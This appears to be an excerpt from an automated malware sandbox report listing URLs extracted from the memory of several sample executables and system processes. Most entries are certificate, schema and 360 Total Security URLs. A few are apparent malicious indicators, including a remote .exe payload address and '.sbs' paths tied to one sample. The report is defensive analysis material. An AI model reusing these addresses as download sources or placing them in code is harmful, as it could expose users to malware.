Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: explorer.exe, 00000024.00000000.1373594900.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000000.1419179675.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1334164364.0000000004E44000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1335128422.0000000004F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://channel.360totalsecurity.com/ins?m2=%s&v611=%s&ch=%s&sch=%s%s?%skeyref_linkPhttps://orion.ts.
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: lgX7lgUL1w.exe	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: svchost.exe, 00000034.00000002.2789612356.000001F4D86DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 00000024.00000000.1373594900.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000000.1419179675.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 00000024.00000000.1373594900.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000000.1419179675.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: lgX7lgUL1w.exe	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: svchost.exe, 00000034.00000003.2005891372.000001F4D9776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2877053965.000001F4D9778000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2848663976.000001F4D963D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1927562259.000001F4D9782000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: svchost.exe, 00000034.00000003.1977042587.000001F4D9655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?6d60373
Source: svchost.exe, 00000034.00000002.2848663976.000001F4D963D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2705850563.000001F4D862B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2876983008.000001F4D9770000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?e5cf4b3
Source: svchost.exe, 00000034.00000002.2848786345.000001F4D9671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?e5cf
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://d3-qihoo360.cdnvideo.ru
Source: svchost.exe, 00000034.00000002.2877539568.000001F4D9913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2877656460.000001F4D9933000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.2360283708.000001F4D9933000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1824819747.000001F4D9935000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1926743882.000001F4D9907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: svchost.exe, 00000034.00000003.1546636466.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1543377086.000001F4D8F07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd$
Source: svchost.exe, 00000034.00000003.1546636466.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1455605121.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1445192248.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1456219320.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1603554186.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1439619921.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1754567640.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1444091539.000001F4D8F0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.2355384079.000001F4D8F0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.2002915745.000001F4D8F0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1441433291.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1549706965.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1487196606.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1440306042.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1451691032.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1543377086.000001F4D8F07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1519000285.000001F4D8F0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1667607943.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1518958283.000001F4D8F07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1909834167.000001F4D8F07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1439541095.000001F4D8F07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
Source: svchost.exe, 00000034.00000003.1480834362.000001F4D8F29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
Source: svchost.exe, 00000034.00000003.1847259219.000001F4D8F07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdoVbwna
Source: svchost.exe, 00000034.00000003.1503483215.000001F4D8F78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
Source: svchost.exe, 00000034.00000003.1802423004.000001F4D8F07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 00000034.00000003.1518958283.000001F4D8F07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd$
Source: svchost.exe, 00000034.00000003.1546636466.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1455605121.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1445192248.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1456219320.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1603554186.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1439619921.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1754567640.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1444091539.000001F4D8F0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.2355384079.000001F4D8F0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.2002915745.000001F4D8F0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1441433291.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1549706965.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1487196606.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1440306042.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1451691032.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1543377086.000001F4D8F07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1519000285.000001F4D8F0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1667607943.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1518958283.000001F4D8F07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1909834167.000001F4D8F07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1439541095.000001F4D8F07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
Source: svchost.exe, 00000034.00000003.1480834362.000001F4D8F29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
Source: svchost.exe, 00000034.00000003.1480834362.000001F4D8F29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
Source: svchost.exe, 00000034.00000003.1407958597.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdmlns:
Source: svchost.exe, 00000034.00000003.2366828259.000001F4D9937000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
Source: svchost.exe, 00000034.00000002.2853548341.000001F4D96A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1803514742.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1847259219.000001F4D8F0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257115899.0000000000471000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://down.360safe.com/setup.exePathSOFTWARE
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257196201.0000000000487000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exe
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257196201.0000000000487000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exe360
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257196201.0000000000487000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exeBUTTONBUTTONProduct32Product64
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://f.alie3ksggg.com/
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://f.alie3ksggg.com/f/oiii.exe
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fleur-de-lis.sbs/jhgfd
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429371121.00000000043A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fleur-de-lis.sbs/jhgfdly
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CC5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://free.360totalsecurity.com
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CC5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://free.360totalsecurity.com.dl.360qhcdn.com
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1282882303.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://int.down.360safe.com/totalsecurity/360TS_Setup.exe/360-total-security/?offline=1P
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1300801700.0000000004140000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://int.down.360safe.com/totalsecurity/360TS_Setup_11.0.0.1103.exe
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284177603.0000000002365000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1258256388.000000000056E000.00000002.00000001.01000000.00000006.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Rel.cab
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Rel.cab.b&;
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1286798746.0000000002364000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Rel.cab.cab
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1279675967.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Rel.cabSE.ca
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1286798746.0000000002364000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284177603.0000000002365000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1282882303.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1283481251.0000000002362000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1279675967.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Rel.cabini
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284177603.0000000002365000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Rel.cabmp
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1286798746.0000000002364000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284177603.0000000002365000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1282882303.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1283481251.0000000002362000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TS.cab
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TS.cab.q
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1258256388.000000000056E000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TS.cabXhttp://www.360totalsecurity.c
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TS.cabp
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TS.cabre
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1282882303.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1279675967.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TS.cabv
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1282882303.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1279675967.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TS.cabz
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1282882303.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1279675967.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TSE.cab
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1282882303.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1283481251.0000000002362000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TSE.cab.
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TSE.cab.b
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1258256388.000000000056E000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TSE.cab9http://int.down.360safe.com/
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TSE.cabe
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1282882303.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1279675967.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TSE.cabg
